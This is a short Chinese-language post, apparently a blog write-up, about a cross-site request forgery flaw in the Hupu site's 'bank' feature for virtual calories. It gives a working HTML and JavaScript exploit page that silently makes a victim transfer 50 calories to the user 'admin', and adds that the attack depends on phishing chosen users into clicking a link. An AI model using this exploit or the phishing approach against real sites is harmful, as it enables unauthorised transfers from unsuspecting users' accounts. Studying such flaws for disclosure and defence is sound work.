虎扑有个银行功能, 存款单位为卡路里
这次试了一下
抓包看到过程
没有token, refer去掉后也依旧转帐成功, 证明存在CSRF可能性
1. 利用xss.js中的代码,在服务器上建立一个html页面
?
1
2
3
4
5
6
<html>
<script src="xss.js"></script>
<script>
xss.csrf(url="http://my.hupu.com/bank_act.php", {"action": "virement", "pwuser": "admin", "to_money": "50", "content_plus": "csrf"});
</script>
</html>
2. 用户点击后就会自动给admin用户转帐50卡路里
3. 利用方面主要依赖钓鱼技巧,给特定用户发链接钓其中招